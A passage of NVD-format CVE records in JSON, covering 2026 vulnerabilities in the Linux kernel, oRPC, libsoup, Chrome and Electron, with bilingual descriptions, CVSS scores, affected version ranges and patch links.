failure.\nNote this patch touches a number of commits, most of which were merged\nbetween 6.6 and 6.14."},{"lang":"es","value":"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nxfs: eliminar las llamadas a xchk_xfile_*_descr\n\nLas macros xchk_xfile_*_descr llaman a kasprintf, lo que puede fallar al asignar memoria si la cadena formateada es mayor de 16 bytes (o cualesquiera que sean las garantías de nofail hoy en día). Algunas de ellas podrían exceder fácilmente eso, y Jiaming Zhang encontró algunos lugares donde eso puede ocurrir con syzbot.\n\nLas descripciones son ayudas de depuración y no se requiere que sean únicas, así que simplemente pasemos cadenas estáticas y eliminemos esta ruta de fallo. 
Nótese que este parche afecta a varios commits, la mayoría de los cuales fueron fusionados entre 6.6 y 6.14."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.10","versionEndExcluding":"6.12.78","matchCriteriaId":"DA007D53-8D99-404A-8E76-341B5D45F5B3"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.18.16","matchCriteriaId":"B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.19","versionEndExcluding":"6.19.6","matchCriteriaId":"373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/18e9cf2259b4157fd282b323514375f2f6a59edb","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/2d8afee89262762fe0e5547772708c75f320c957","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/60382993a2e18041f88c7969f567f168cd3b4de3","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/695455fbc49053cbf555f2f302a5dcd600f412ff","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}},{"cve":{"id":"CVE-2026-23253","sourceIdentif
ier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2026-03-18T18:16:23.383","lastModified":"2026-06-01T14:08:30.670","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-core: fix wrong reinitialization of ringbuffer on reopen\n\ndvb_dvr_open() calls dvb_ringbuffer_init() when a new reader opens the\nDVR device.  dvb_ringbuffer_init() calls init_waitqueue_head(), which\nreinitializes the waitqueue list head to empty.\n\nSince dmxdev->dvr_buffer.queue is a shared waitqueue (all opens of the\nsame DVR device share it), this orphans any existing waitqueue entries\nfrom io_uring poll or epoll, leaving them with stale prev/next pointers\nwhile the list head is reset to {self, self}.\n\nThe waitqueue and spinlock in dvr_buffer are already properly\ninitialized once in dvb_dmxdev_init().  The open path only needs to\nreset the buffer data pointer, size, and read/write positions.\n\nReplace the dvb_ringbuffer_init() call in dvb_dvr_open() with direct\nassignment of data/size and a call to dvb_ringbuffer_reset(), which\nproperly resets pread, pwrite, and error with correct memory ordering\nwithout touching the waitqueue or spinlock."},{"lang":"es","value":"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nmedia: dvb-core: corrige la reinicialización incorrecta del búfer circular al reabrir\n\ndvb_dvr_open() llama a dvb_ringbuffer_init() cuando un nuevo lector abre el dispositivo DVR. 
dvb_ringbuffer_init() llama a init_waitqueue_head(), lo que reinicializa la cabecera de la lista de la cola de espera a vacía.\n\nDado que dmxdev->dvr_buffer.queue es una cola de espera compartida (todas las aperturas del mismo dispositivo DVR la comparten), esto deja huérfanas las entradas existentes de la cola de espera de io_uring poll o epoll, dejándolas con punteros prev/next obsoletos mientras la cabecera de la lista se restablece a {self, self}.\n\nLa cola de espera y el spinlock en dvr_buffer ya están correctamente inicializados una vez en dvb_dmxdev_init(). La ruta de apertura solo necesita restablecer el puntero de datos del búfer, el tamaño y las posiciones de lectura/escritura.\n\nReemplace la llamada a dvb_ringbuffer_init() en dvb_dvr_open() con la asignación directa de datos/tamaño y una llamada a dvb_ringbuffer_reset(), que restablece correctamente pread, pwrite y error con el ordenamiento de memoria correcto sin tocar la cola de espera o el spinlock."}],"metrics":{"cvssMetricV31":[{"source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"2.6.17","versionEndExcluding":"5.10.253","matchCriteriaId":"CD6C2FEB-75E3-41E6-905C-667A819D083A"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.11","versionEndExcluding":"5.15.203","matchCrit
eriaId":"20DDB3E9-AABF-4107-ADB0-5362AA067045"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"5.16","versionEndExcluding":"6.1.167","matchCriteriaId":"2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2","versionEndExcluding":"6.6.130","matchCriteriaId":"C57BB918-DF28-46B3-94F7-144176841267"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.7","versionEndExcluding":"6.12.77","matchCriteriaId":"B3D12E00-E42D-4056-B354-BAD4903C03A5"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.18.17","matchCriteriaId":"A5E006E4-59C7-43C1-9231-62A72219F2BA"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.19","versionEndExcluding":"6.19.7","matchCriteriaId":"69245D10-0B71-485E-80C3-A64F077004D3"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*","matchCriteriaId":"F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/32eb8e4adc207ef31bc6e5ae56bab940b0176066","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/527cfa8a3486b3555c5c15e2f62be484a11398dc","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/af050ab44fa1b1897a940d7d756e512232f5e5df","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/bfbc0b5b32a8f28ce284add619bf226716a59bc0","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/cfd94642025e6f71c8f754bdec0800ee95e4f3dd","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/d71781bad59b1c9d60d70680045
81f9bf19c0c9d","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/f1e520ca2e83ece6731af6167c9e5e16931ecba0","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/fb378cf89be434ed1f10ab79cc4788fba8ae868d","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}},{"cve":{"id":"CVE-2026-23254","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2026-03-18T18:16:23.530","lastModified":"2026-06-01T14:10:37.893","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet: gro: fix outer network offset\n\nThe udp GRO complete stage assumes that all the packets inserted the RX\nhave the `encapsulation` flag zeroed. Such assumption is not true, as a\nfew H/W NICs can set such flag when H/W offloading the checksum for\nan UDP encapsulated traffic, the tun driver can inject GSO packets with\nUDP encapsulation and the problematic layout can also be created via\na veth based setup.\n\nDue to the above, in the problematic scenarios, udp4_gro_complete() uses\nthe wrong network offset (inner instead of outer) to compute the outer\nUDP header pseudo checksum, leading to csum validation errors later on\nin packet processing.\n\nAddress the issue always clearing the encapsulation flag at GRO completion\ntime. Such flag will be set again as needed for encapsulated packets by\nudp_gro_complete()."},{"lang":"es","value":"En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: gro: corregir desplazamiento de red externo\n\nLa etapa de completado de GRO de UDP asume que todos los paquetes insertados en el RX tienen el indicador 'encapsulation' puesto a cero. 
Dicha suposición no es cierta, ya que algunas NIC de H/W pueden establecer dicho indicador al descargar el checksum por H/W para un tráfico UDP encapsulado, el controlador tun puede inyectar paquetes GSO con encapsulación UDP y la disposición problemática también puede crearse a través de una configuración basada en veth.\n\nDebido a lo anterior, en los escenarios problemáticos, udp4_gro_complete() utiliza el desplazamiento de red incorrecto (interno en lugar de externo) para calcular el pseudo checksum del encabezado UDP externo, lo que lleva a errores de validación de csum más adelante en el procesamiento de paquetes.\n\nAbordar el problema siempre borrando el indicador de encapsulación en el momento de completado de GRO. Dicho indicador se establecerá de nuevo según sea necesario para paquetes encapsulados por udp_gro_complete()."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.6.31","versionEndExcluding":"6.6.124","matchCriteriaId":"7227C1EF-FAE4-4A81-A334-1487EFCBF507"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.8.10","versionEndExcluding":"6.9","matchCriteriaId":"DD26A649-FB0B-4A7B-A16B-A9D27807D7E9"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.9.1","versionEn
dExcluding":"6.12.70","matchCriteriaId":"389604B3-C4AF-4558-AE99-65329C545794"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.18.10","matchCriteriaId":"7156C23F-009E-4D05-838C-A2DA417B5B8D"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.9:-:*:*:*:*:*:*","matchCriteriaId":"3F2A4A3D-068A-4CF2-A09F-9C7937DDB0A5"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.9:rc7:*:*:*:*:*:*","matchCriteriaId":"DAECDCD8-F556-4606-8D7B-5C6D47A501F2"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*","matchCriteriaId":"17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*","matchCriteriaId":"C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*","matchCriteriaId":"F71D92C0-C023-48BD-B3B6-70B638EEE298"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*","matchCriteriaId":"13580667-0A98-40CC-B29F-D12790B91BDB"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*","matchCriteriaId":"CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*","matchCriteriaId":"3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*","matchCriteriaId":"F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*","matchCriteriaId":"EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/2e5edb69e5d0e23ef248c56fc977039268c77a7b","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/5c2c3c38be396257a6a2e55bd601a12bb9781507","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"htt
ps://git.kernel.org/stable/c/9d40a85138568696387ef04cd004c64612a70874","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/b83557bc6f560433fe5d727e241069f8db5ba709","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}},{"cve":{"id":"CVE-2026-33331","sourceIdentifier":"security-advisories@github.com","published":"2026-03-24T20:16:28.547","lastModified":"2026-06-01T12:21:12.373","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"oRPC is a tool that helps build APIs that are end-to-end type-safe and adhere to OpenAPI standards. Prior to version 1.13.9, a stored cross-site scripting (XSS) vulnerability exists in the OpenAPI documentation generation of orpc. If an attacker can control any field within the OpenAPI specification (such as info.description), they can break out of the JSON context and execute arbitrary JavaScript when a user views the generated API documentation. This issue has been patched in version 1.13.9."},{"lang":"es","value":"oRPC es una herramienta que ayuda a construir APIs que son de tipo seguro de extremo a extremo y se adhieren a los estándares de OpenAPI. Antes de la versión 1.13.9, existe una vulnerabilidad de cross-site scripting (XSS) almacenado en la generación de documentación de OpenAPI de oRPC. Si un atacante puede controlar cualquier campo dentro de la especificación de OpenAPI (como info.description), pueden salir del contexto JSON y ejecutar JavaScript arbitrario cuando un usuario ve la documentación de la API generada. 
Este problema ha sido parcheado en la versión 1.13.9."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:orpc:orpc:*:*:*:*:*:*:*:*","versionEndExcluding":"1.13.9","matchCriteriaId":"137D3616-F542-4117-A6F1-D7A0E9C57A01"}]}]}],"references":[{"url":"https://github.com/middleapi/orpc/commit/4f0efa8a1d3fa8e8317a4b03cc3945a5dfd68add","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/middleapi/orpc/releases/tag/v1.13.9","source":"security-advisories@github.com","tags":["Product","Release Notes"]},{"url":"https://github.com/middleapi/orpc/security/advisories/GHSA-7f6v-3gx7-27q8","source":"security-advisories@github.com","tags":["Exploit","Mitigation","Vendor Advisory"]},{"url":"https://github.com/middleapi/orpc/security/advisories/GHSA-7f6v-3gx7-27q8","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Mitigation","Vendor 
Advisory"]}]}},{"cve":{"id":"CVE-2026-5119","sourceIdentifier":"secalert@redhat.com","published":"2026-03-30T07:15:58.350","lastModified":"2026-06-01T13:16:33.290","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in libsoup. When establishing HTTPS tunnels through a configured HTTP proxy, sensitive session cookies are transmitted in cleartext within the initial HTTP CONNECT request. A network-positioned attacker or a malicious HTTP proxy can intercept these cookies, leading to potential session hijacking or user impersonation."},{"lang":"es","value":"Se encontró una vulnerabilidad en libsoup. Al establecer túneles HTTPS a través de un proxy HTTP configurado, las cookies de sesión sensibles se transmiten en texto claro dentro de la solicitud HTTP CONNECT inicial. Un atacante posicionado en la red o un proxy HTTP malicioso puede interceptar estas cookies, lo que podría conducir al secuestro potencial de la sesión o a la suplantación de identidad del 
usuario."}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":4.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":4.2}]},"weaknesses":[{"source":"secalert@redhat.com","type":"Secondary","description":[{"lang":"en","value":"CWE-319"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:gnome:libsoup:-:*:*:*:*:*:*:*","matchCriteriaId":"C5BAC4F4-3ACD-4F4D-920C-F920FD2C5472"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*","matchCriteriaId":"142AD0DD-4CF3-4D74-9442-459CE3347E3A"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*","matchCriteriaId":"F4CFF558-3C47-480D-A2F0-BABF26042943"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*","matchCriteriaId":"7F6FB57C-2BC7-487C-96DD-132683AEB35D"},{"vulnerable":true,"criteria":"cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*","matchCriteriaId":"D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}],"references":[{"url":"https://access.redhat.com/errata/RHSA-2026:13978","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:14087","source":"secalert@redhat.com"},{"url":"https
://access.redhat.com/errata/RHSA-2026:15968","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:17482","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:19143","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:19356","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:21686","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/errata/RHSA-2026:22316","source":"secalert@redhat.com"},{"url":"https://access.redhat.com/security/cve/CVE-2026-5119","source":"secalert@redhat.com","tags":["Mitigation","Vendor Advisory"]},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2452932","source":"secalert@redhat.com","tags":["Issue Tracking","Vendor Advisory"]},{"url":"https://gitlab.gnome.org/GNOME/libsoup/-/issues/502","source":"secalert@redhat.com","tags":["Exploit","Issue Tracking"]}]}},{"cve":{"id":"CVE-2026-5273","sourceIdentifier":"chrome-cve-admin@google.com","published":"2026-04-01T05:16:00.427","lastModified":"2026-06-01T12:21:23.610","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Use after free in CSS in Google Chrome prior to 146.0.7680.178 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. 
(Chromium security severity: High)"}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L","baseScore":6.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":3.4}]},"weaknesses":[{"source":"chrome-cve-admin@google.com","type":"Secondary","description":[{"lang":"en","value":"CWE-416"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*","versionEndExcluding":"146.0.7680.177","matchCriteriaId":"55B0324F-7911-403B-8235-D71996B55DFB"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*","matchCriteriaId":"387021A0-AF36-463C-A605-32EA7DAC172E"},{"vulnerable":false,"criteria":"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*","matchCriteriaId":"703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"},{"vulnerable":false,"criteria":"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*","matchCriteriaId":"A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}],"references":[{"url":"https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop_31.html","source":"chrome-cve-admin@google.com","tags":["Vendor Advisory"]},{"url":"https://issues.chromium.org/issues/493952652","source":"chrome-cve-admin@google.com","tags":["Issue Tracking","Permissions Required"]}]}},{"cve":{"id":"CVE-2026-34769","sourceIdentifier":"security-advisories@github.com","published":"2026-04-04T00:16:17.657","lastModified":"2026-06-01T12:21:31.787","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Electron is a framework for writing cross-platform desktop applications using 
JavaScript, HTML and CSS. Prior to versions 38.8.6, 39.8.0, 40.7.0, and 41.0.0-beta.8, an undocumented commandLineSwitches webPreference allowed arbitrary switches to be appended to the renderer process command line. Apps that construct webPreferences by spreading untrusted configuration objects may inadvertently allow an attacker to inject switches that disable renderer sandboxing or web security controls. Apps are only affected if they construct webPreferences from external or untrusted input without an allowlist. Apps that use a fixed, hardcoded webPreferences object are not affected. This issue has been patched in versions 38.8.6, 39.8.0, 40.7.0, and 41.0.0-beta.8."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.0,"impactScore":6.0},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-88"},{"lang":"en","value":"CWE-912"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*","versionEndExcluding":"38.8.6","matchCriteriaId":"9CE003A2-03CC-4355-AA17-2CBD204EC6C3"},{"vulnerable":true
,"criteria":"cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*","versionStartIncluding":"39.0.0","versionEndExcluding":"39.8.0","matchCriteriaId":"642CA6B2-000A-480D-B062-80593D150787"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:*:*:*:*:*:node.js:*:*","versionStartIncluding":"40.0.0","versionEndExcluding":"40.7.0","matchCriteriaId":"E54036E0-1D1F-4265-A2F3-B9C1F88F65ED"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha1:*:*:*:node.js:*:*","matchCriteriaId":"A20225D6-F435-4D09-962D-B162F521B6AD"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha2:*:*:*:node.js:*:*","matchCriteriaId":"33712802-EB60-4E9A-83B8-9F2320B70CB4"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha3:*:*:*:node.js:*:*","matchCriteriaId":"9D0A9142-54FE-47BB-9FEB-5E97528E28FE"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha4:*:*:*:node.js:*:*","matchCriteriaId":"9E1D191F-DEAE-4DB3-9822-F31AF9FE3BAC"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha5:*:*:*:node.js:*:*","matchCriteriaId":"45A8192F-3D2C-4987-9BBE-7ECC3F71965D"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:alpha6:*:*:*:node.js:*:*","matchCriteriaId":"EEA1A2E5-03DB-46CB-8427-7F31A8A7CE1C"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta1:*:*:*:node.js:*:*","matchCriteriaId":"B2DFCE75-BD3F-4537-B5B8-14097E262EA2"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta2:*:*:*:node.js:*:*","matchCriteriaId":"BC346E25-EA43-4615-8CDB-16D15D46E4FF"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta3:*:*:*:node.js:*:*","matchCriteriaId":"FA5B3C00-CAFC-4995-BF35-9920F3039E77"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta4:*:*:*:node.js:*:*","matchCriteriaId":"3672F3FB-6B5E-40FD-8A92-CB4DD6BC6A93"},{"vulnerable":true,"criteria":"cpe:2.3:a:electronjs:electron:41.0.0:beta5:*:*:*:node.js:*:
